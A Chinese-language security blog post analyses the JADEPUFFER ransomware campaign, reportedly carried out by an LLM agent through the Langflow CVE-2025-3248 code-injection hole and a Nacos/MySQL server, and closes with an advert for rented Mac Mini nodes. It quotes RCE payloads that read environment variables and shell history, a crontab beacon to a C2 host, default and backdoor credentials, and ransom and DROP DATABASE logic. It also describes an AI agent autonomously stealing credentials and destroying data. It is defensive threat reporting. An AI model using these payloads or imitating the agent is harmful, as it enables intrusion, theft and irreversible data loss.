AI 安全事件 2026年7月7日 約 28 分鐘 JADEPUFFER Langflow

JADEPUFFER:首例 LLM 全自主勒索
Langflow 漏洞、攻擊鏈與租 Mac 安全部署

Sysdig 原始取證 · CVE-2025-3248 技術拆解 · 600+ payload 攻擊鏈 · ATA 四條證據線 · Mac Mini M4 隔離驗收清單

JADEPUFFER 智慧體勒索事件與 Langflow CVE-2025-3248 安全警示示意圖

TL;DR:2026 年 7 月 1 日,雲安全公司 Sysdig 威脅研究團隊(TRT,報告作者 Michael Clark)首次公開披露代號 JADEPUFFER 的完整勒索操作——從踩點偵察、憑證竊取、橫向移動、許可權維持到破壞性加密與勒索信投遞,全程由大語言模型 Agent 自主驅動,無人類在關鍵節點手動操作。Sysdig 將其定義為 Agentic Threat Actor(ATA,智慧體威脅行為者)。入口是一臺公網暴露的 Langflow 例項(CVE-2025-3248),真正目標是另一臺暴露於公網的 MySQL + 阿里巴巴 Nacos 生產伺服器;整場攻擊捕獲 超過 600 條有明確目的的 payload。本文包含:完整時間線、漏洞技術拆解、兩階段攻擊鏈還原、四條自主性證據、比特幣地址懸案、IOC 彙總、官方防禦建議、行業反應、Sysdig 四點結論,以及為何部署 OpenClaw / Langflow 等 AI Agent 時應考慮租用隔離的 Mac Mini M4而非把編排伺服器直接暴露公網。

01

事件概述:勒索軟體有了「AI 操作員」

自勒索軟體成為威脅類別以來,鍵盤背後總有一個「人」——要麼親自操作,要麼事先寫好指令碼。JADEPUFFER 打破了這個前提:Sysdig 評估這是目前已知第一例端到端、完全由大語言模型驅動的完整勒索操作

維度詳情
發現方Sysdig 威脅研究團隊(TRT),報告作者 Michael Clark(Director of Threat Research)
釋出時間2026 年 7 月 1 日(Dark Reading、BleepingComputer 等 7 月 2–6 日跟進,外界常以「7 月 6 日」為公眾認知節點)
攻擊者代號JADEPUFFER(Sysdig 官方全大寫命名)
新分類ATA(Agentic Threat Actor)——攻擊能力由 AI Agent 交付,而非人工驅動的工具集
入口機公網暴露的 Langflow 例項(CVE-2025-3248)
真正目標另一臺公網暴露、執行 MySQL + 阿里巴巴 Nacos 的生產伺服器
規模超過 600 條獨立、有明確目的的 payload,壓縮時間視窗內執行完畢

痛點拆解:為何與 OpenClaw / Langflow 使用者相關

  1. 01

    AI 編排伺服器常存 API Key:Langflow 這類 Agent 工作流伺服器的環境變數裡往往放著 OpenAI、Anthropic、DeepSeek、Gemini 及阿里雲/騰訊雲憑證——正是 JADEPUFFER 第一階段並行掃描的目標。

  2. 02

    倉促上線、直接暴露公網:很多團隊為快速驗證原型,把 Langflow / OpenClaw Gateway 直接掛在公網 IP 上,沒有訪問控制。

  3. 03

    老漏洞 + 自動化武器化:CVE-2025-3248 早在 2025 年 4 月披露、5 月進 CISA KEV;Agent 讓「把歷史漏洞庫挨個噴一遍」的成本趨近於零。

  4. 04

    LLMjacking 邊際成本為零:若攻擊者本身靠竊取的模型/雲憑證驅動 Agent,發起多階段攻擊的經濟門檻極低。

02

時間線

時間事件
2025 年 4 月Langflow 曝出 CVE-2025-3248(未鑑權程式碼注入 / RCE)
2025 年 5 月 5 日CISA 列入「已知被利用漏洞」(KEV)目錄
2025 年同一漏洞被用於投遞 Flodrix 殭屍網路(Trend Micro 獨立披露,與 JADEPUFFER 無關但說明漏洞長期被公網掃描利用)
2026 年 6 月JADEPUFFER 對公網 Langflow 發起攻擊,完整攻擊鏈在數週內分多個會話執行
2026 年 7 月 1 日Sysdig 釋出完整技術報告
2026 年 7 月 2–6 日Dark Reading、BleepingComputer、CyberScoop、CSO Online、Security Affairs 等跟進報道
03

CVE-2025-3248:Langflow 未鑑權 RCE 完整技術分析

專案詳情
元件Langflow —— 開源視覺化 AI Agent 工作流框架,GitHub 星標 7 萬+
漏洞型別CWE-94(程式碼注入)+ CWE-306(關鍵功能缺失身份驗證)
CVSS9.8(Critical),向量 CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
影響版本Langflow 1.3.0 之前所有版本
漏洞位置/api/v1/validate/code 介面
修復版本1.3.0(新增身份校驗)
EPSS 被利用機率91.42%(SentinelOne 資料)

成因五步拆解:

  1. 01

    Langflow 提供「程式碼校驗」介面,讓使用者在視覺化編排裡寫自定義函式節點時提前校驗語法。

  2. 02

    實現方式:使用者程式碼 → ast.parse()compile()exec() 執行。

  3. 03

    關鍵缺陷:完全沒有身份認證,也沒有任何沙箱隔離。

  4. 04

    利用技巧:Python 裝飾器與引數預設值在函式定義時立即求值;攻擊者把惡意程式碼寫進預設引數或裝飾器,一旦 Langflow 拿去「校驗」,程式碼已在伺服器執行。

  5. 05

    攻擊者無需登入、無需許可權,只需一個精心構造的 HTTP POST 即可 RCE。

Trend Micro 記錄的 Flodrix 活動典型 payload(同一漏洞,獨立事件)
exec('raise Exception(__import__("subprocess").check_output("whoami", shell=True))')
exec('raise Exception(__import__("subprocess").check_output("printenv", shell=True))')
exec('raise Exception(__import__("subprocess").check_output("cat /root/.bash_history", shell=True))')

重要區分:Flodrix 殭屍網路與 JADEPUFFER 是兩起獨立利用活動,共享同一漏洞入口。前者是傳統指令碼化投遞;後者才是 Sysdig 披露的「AI Agent 自主驅動」勒索。

官方補丁(1.3.0):post_validate_code 新增 _current_user: CurrentActiveUser 依賴注入;FastAPI 先校驗 JWT Bearer Token 或 x-api-key,失敗直接 401/403,請求不會到達漏洞邏輯。

04

攻擊鏈 Phase 1:拿下 Langflow 主機

Sysdig 指出 Langflow 成為「有吸引力入口」的原因:環境變數常存大模型 API Key 與雲憑證;很多團隊倉促上線、缺乏網路訪問控制。

全部 payload 以 Base64 編碼 Python 通過 Langflow RCE 端點投遞。

① 偵察與憑證收集(多執行緒並行)

執行 iduname -ahostname 等基礎列舉,並行掃描:OpenAI / Anthropic / DeepSeek / Gemini API Key;ALIBABA_ALIYUN_TENCENT_HUAWEI_ 及 AWS/GCP/Azure 憑證;加密貨幣錢包與助記詞;資料庫憑證與配置檔案。

② 本地資料竊取

匯出 Langflow 自身 PostgreSQL 後端資料庫,竊取憑證、API Key 與使用者記錄,暫存本地審閱後刪除(清理痕跡)。

③ 內部橫向發現

掃描內網地址空間與具名服務,用預設憑證探測資料庫、物件儲存、金鑰庫與服務發現端點。

④ MinIO 列舉(自適應細節)

探測 minio.internal:9000127.0.0.1:9000,用預設憑證 minioadmin:minioadmin 走完列舉;發現含 terraform-state 的 bucket 後定向提取 credentials.json自適應細節:第一次請求帶 ?format=json 卻收到 XML,下一條 payload 立即改用 XML 解析器重試——典型的「探測-遇錯-自適應」閉環。

⑤ 持久化

crontab 信標(每 30 分鐘)
*/30 * * * * python3 -c "import urllib.request;urllib.request.urlopen('hxxp://45.131.66[.]106:4444/beacon',timeout=5)"
05

攻擊鏈 Phase 2:MySQL + Nacos 生產伺服器

真正目標是另一臺同樣暴露公網、執行 MySQL 與阿里巴巴 Nacos 的生產伺服器。Nacos 有鑑權繞過歷史(CVE-2021-29441 及相關變種),且預設 JWT 簽名金鑰自 2020 年起被公開文件記錄,許多部署至今未更換。

Agent 用 root 憑證直接連線暴露的 MySQL 埠——這組憑證來源不明,Sysdig 未觀察到從受害者環境竊取,可能是少數「人類預先準備」環節之一。

Nacos 後門管理員:31 秒修復閉環

時間(UTC)動作
19:34:24生成 bcrypt 雜湊,插入 xadmin 及管理員角色
19:34:36嘗試 xadmin:Xploit@2026# 登入,失敗
19:34:4812 秒後並行測試 nacos:nacos 預設憑證並重新生成更簡單密碼雜湊
19:35:07放棄 subprocess.run,改用 import bcrypt,刪除損壞記錄後重建
19:35:18登入成功——總耗時 31 秒

容器逃逸探測(約 8 分鐘)

利用 MySQL INTO OUTFILE / LOAD_FILE 測試寫入、讀回、/var/run/docker.sock/proc/1/cgroup/etc/hostname 及 UDF 提權路徑。進入勒索前主動寫「完成標記」——Sysdig 指出這更像 Agent 完成任務後發出進入下一階段的訊號,而非固定指令碼行為。

破壞性加密與勒索

將全部 1,342 條 Nacos 服務配置項用 MySQL AES_ENCRYPT() 加密,刪除原始 config_infohis_config_info,建立勒索信表 README_RANSOM

勒索核心邏輯(Sysdig 取證還原,已脫敏)
KEY = base64.b64encode(uuid.uuid4().bytes + uuid.uuid4().bytes).decode()
print("Encryption key:", KEY)  # 僅列印一次,從未儲存或外傳
# 建立 config_info_enc → DROP config_info → CREATE README_RANSOM
# 比特幣: 3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy
# 聯絡: e78393397[@]proton[.]me

關鍵細節:勒索信聲稱 AES-256,但 MySQL AES_ENCRYPT() 預設實為 AES-128-ECB;加密金鑰隨機生成、只打印到 stdout、從未儲存或傳輸——即便付款也無法恢復。兩分鐘後 Agent 又發出 payload 把數字精修為「全部 1342 項已加密」。

大規模破壞與診斷式糾錯

升級到直接 DROP DATABASE,程式碼註釋自述「高 ROI 資料庫,已備份至 64.20.53[.]230」——Sysdig 無獨立證據證實資料真的回傳。一條 DROP DATABASE 因外部索引鍵約束靜默失敗後,下一條 payload 自動加上 SET GLOBAL FOREIGN_KEY_CHECKS=0——修復要求「理解為什麼失敗」,而非無腦重試。

06

「自主性」的四條證據線

  1. 01

    自我敘事的程式碼:payload 裡充斥自然語言註釋,解釋每一步「為什麼」——包括 ROI 排序、指出「哪個資料庫最大」。這些註釋原生存在於攻擊者程式碼,非研究人員事後推斷。

  2. 02

    機器速度的故障診斷與修正:Nacos 後門 31 秒修復是最典型例子;MinIO XML/JSON 自適應、JWT 路徑遇阻即放棄,模式反覆出現。

  3. 03

    對自然語言上下文的理解:解析目標環境中自由文本並採取「只有讀懂才會做」的動作,在相隔數週的不同會話中反覆出現。

  4. 04

    比特幣地址懸案:見下一節——兩種解讀均無法排除,體現 AI 自主性給溯源帶來的新不確定性。

結合「600+ 條 payload 在壓縮視窗內連貫執行」,Sysdig 認為證據指向自主運作的 Agent,而非人工或固定工具集。

07

比特幣地址懸案

勒索信比特幣地址 3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy 是比特幣開發者文件與 Bitcoin Core 倉庫裡反覆使用的標準 P2SH 格式示例地址,大量存在於大模型訓練語料中。

鏈上資料:歷史 737 筆已確認交易,累計約 46 枚比特幣,當前餘額為零(每筆存入立刻轉走)。

Sysdig 兩種無法區分的解讀:(a) LLM 在訓練資料基礎上「幻覺」生成,錢包屬第三方專門「打掃」誤轉存款;(b) 攻擊者確實配置了真實可控錢包,只是恰好與文件示例重合。研究團隊無法看到 JADEPUFFER 的 system prompt,兩種可能性目前均無法排除

08

IOC(入侵指標)彙總

型別指標
C2 / 信標45.131.66[.]106;crontab 信標 hxxp://45.131.66[.]106:4444/beacon
資料暫存/外洩(未證實)64.20.53[.]230(InterServer,AS19318)
入口漏洞CVE-2025-3248
勒索比特幣3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy
勒索郵箱e78393397[@]proton[.]me(威脅情報庫無命中,格式與已知 MySQL 勒索團伙慣用聯絡方式不同)
勒索表名README_RANSOM(與 WARNING、RECOVER_YOUR_DATA 等已知表名均不匹配)
持久化crontab 每 30 分鐘向 C2 4444 埠信標外聯

Sysdig 特別指出:勒索郵箱與表名看似符合人類勒索慣例,實則查無先例,進一步支援「全新、Agent 驅動」而非已知團伙常規套路。

09

官方防禦建議(Sysdig 原文整理)

  1. 01

    將 Langflow 升級到修復 CVE-2025-3248 的版本;不要把程式碼執行/校驗類端點暴露在公網

  2. 02

    使用執行時威脅檢測,識別資料庫程序中的惡意行為。

  3. 03

    不要讓 AI 編排伺服器執行環境裡存放大模型 API Key 或雲憑證——金鑰託管到專門服務,與可被公網訪問的程序隔離。

  4. 04

    加固 Nacos:更換預設 token.secret.key,升級強制自定義金鑰版本;永遠不要把 Nacos 暴露公網,勿以 root 連線後端資料庫。

  5. 05

    永遠不要把資料庫管理員賬號暴露在公網;管理埠強制強唯一憑證與來源 IP 限制。

  6. 06

    對外施加出站流量控制(egress control),防止被攻陷主機任意信標外聯或訪問外部暫存伺服器。

  7. 07

    監控上述 IOC;關注呼叫外網請求的計劃任務與括號包裹的 User-Agent 異常等特徵。

10

行業與專家反應

BleepingComputer、Dark Reading、CyberScoop、Security Affairs 等第一時間跟進,普遍稱其為「首例完全由 AI 驅動的勒索攻擊」,強調 ATA 時代到來。

「我更傾向於把這看作是『執行方式上的演進』,而不是一種全新的勒索技術。區別在於這次 AI Agent 能把偵察、憑證竊取和部署自主串聯起來。」—— 獨立安全研究員 Vibhum Dubey(CSO Online 採訪)

Dubey 同時指出:真正值得擔心的不是最後的加密階段,而是加密之前那段「安靜期」——Agent 悄悄摸清身份體系、許可權與信任鏈條,同時規避被發現;某條路被攔會迅速切換戰術,每次入侵表現形式都可能略有不同。

多家媒體提到 LLMjacking:攻擊者靠竊取憑證驅動 Agent,複雜多階段攻擊的邊際成本趨近於零

11

Sysdig 的四點結論與意義

  1. 01

    勒索軟體不再是「高技能者的手藝」:LLM Agent 可串聯偵察、竊取、橫向移動、持久化與破壞,操作者無需深厚專業知識。

  2. 02

    老漏洞正在被自動化武器化:下游目標利用 2021 年 Nacos 問題與從未更換的預設金鑰;Agent 讓「歷史漏洞庫挨個噴」成本幾乎為零。

  3. 03

    意圖變得「可讀」——也是防守方機會:LLM 在 payload 裡敘述目標,客觀上提供此前不曾有的檢測與研判抓手。

  4. 04

    「已備份」只是 Agent 自述:加密金鑰臨時生成且不可恢復,即便付款配置資料也無法找回。

報告結尾強調:用到的每一項單獨技術都不新、不復雜;真正值得關注的是 AI 模型把這些技術串成完整勒索操作,針對本就被忽視的公網基礎設施。執行勒索軟體的技能門檻已降到「執行一個 Agent 的成本」。

12

決策矩陣:自託管 AI 編排 vs 租用 Mac Mini M4 隔離部署

JADEPUFFER 的受害者畫像很清晰:把 Langflow 直接暴露公網、環境變數裡塞滿 API Key、生產 MySQL/Nacos 同樣裸露。對要在 macOS 上跑 OpenClaw、Langflow 或 Hermes Agent 的開發者,「買一臺 Mac mini 自己掛公網」與「租用隔離遠端 Mac」需要重新算賬——尤其在蘋果 2026 年 6 月漲價後(參見站內 Mac Mini M4 租 vs 買)。

維度自購 Mac + 自託管暴露公網租用 VNCMac Mac Mini M4(隔離節點)
初始成本漲價後基礎款 ¥5,999+,含 AppleCare/電費/公網 IP按天 ¥30–50 / 按月 ¥600–900,隨用隨停
暴露面需自行配置防火牆、反代、證書;易誤把 Gateway/validate 端點掛公網供應商側網路隔離;你通過 SSH/VNC 接入,預設不鼓勵把 Agent 控制台裸露公網
API Key 管理常寫進 .env / 環境變數(JADEPUFFER 第一階段重點掃描目標)可配合 SecretRef / 金鑰託管;專案結束換節點即清環境
圖形化驗收本地操作VNC 核對 OpenClaw 授權彈窗、Gateway 控制台、macOS 隱私許可權(參見站內 OpenClaw 圖形化授權
出站控制需自建 egress 策略可結合幫助頁 SSH 隧道,減少盲目公網信標
事故後處置主力機被汙染、金鑰洩露面大停租 / 換節點,物理隔離節點不拖累本地 Windows 主力機

可引用數字(來自本事件取證)

  • Langflow GitHub 7 萬+ 星標,CVE-2025-3248 EPSS 91.42%
  • 攻擊鏈 600+ payload,Nacos 1,342 項配置被加密
  • Nacos 後門從失敗到修復 31 秒
  • 比特幣示例地址歷史 737 筆交易、約 46 BTC 流經
13

五步安全部署清單(遠端 Mac + VNC)

  1. 01

    開通隔離節點:選擇 Mac Mini M4 套餐,不要把 OpenClaw Gateway(18789)或 Langflow validate 端點直接對映到公網;需要外網訪問時走 Nginx/Caddy 反代 + HTTPS(參見站內 Gateway 公網反代)。

  2. 02

    升級與補丁:Langflow ≥ 1.3.0;Nacos 更換預設 JWT 金鑰;資料庫禁止 root 公網可達

  3. 03

    金鑰不進環境變數:大模型 API Key 用金鑰管理服務或 OpenClaw SecretRef,與可被 RCE 的程序隔離。

  4. 04

    VNC 圖形驗收:在遠端桌面核對 Gateway 控制台、外掛審批(/approve)、macOS 螢幕錄製/輔助功能許可權;SSH-only 無法完成的步驟必須開 VNC。

  5. 05

    出站與 IOC 監控:限制被攻陷主機對外信標;關注 crontab 外聯與 README_RANSOM 等 IOC;專案結束匯出備份後停租。

FAQ

常見問題

不是。兩者都利用 CVE-2025-3248,但 Flodrix 是傳統指令碼化殭屍網路投遞;JADEPUFFER 才是 Sysdig 披露的 AI Agent 自主勒索。

不能。金鑰由 uuid4() 隨機生成,僅列印到 stdout,攻擊者自己也拿不出可用金鑰;資料已實質性永久丟失。

風險邏輯相同:公網暴露 + 環境變數存金鑰 + 未加固依賴服務。請升級依賴、限制出站、用 VNC 在隔離遠端 Mac 上部署並驗收,勿把 Gateway 裸奔公網。

Sysdig 與多家媒體認為,隨著 Agent 工具成熟,此類攻擊數量與覆蓋面只會上升;公網應用伺服器、未加固配置中心、公網資料庫管理員賬號將是最先被盯上的攻擊面。

OpenClaw / Claude Code 等大量步驟需要 macOS 圖形許可權與掃碼授權,Linux 無桌面無法完成;租用物理 Mac + VNC 可在隔離環境跑通全流程,又不必自購漲價後的硬體。參見站內 Linux 無桌面 vs Mac+VNC

參考信源

Sysdig《JADEPUFFER: Agentic ransomware for automated database extortion》;BleepingComputer;Dark Reading;CyberScoop;CSO Online(Vibhum Dubey);Security Affairs;Trend Micro(CVE-2025-3248 / Flodrix);NVD / SentinelOne / Zscaler;CISA KEV 目錄。

結語

JADEPUFFER 是一記警鐘:AI Agent 讓「偵察 → 竊取 → 橫向移動 → 加密勒索」的門檻降到執行一個模型所需的成本,而受害者往往是本就被忽視的公網基礎設施。對要在 macOS 上部署 OpenClaw、Langflow 或本地 Agent 的開發者,自購 Mac mini 再自行暴露公網,隱性風險(金鑰洩露、補丁滯後、出站失控)在 ATA 時代被成倍放大。

租用 VNCMac 的 Mac Mini M4 隔離節點,通過 VNC 完成 Gateway 與系統許可權驗收,金鑰不進環境變數、專案結束即停租——比把 AI 編排伺服器掛在自家公網 IP 上更可控。檢視 Mac Mini M4 套餐 與幫助頁 SSH-VNC 說明即可開通。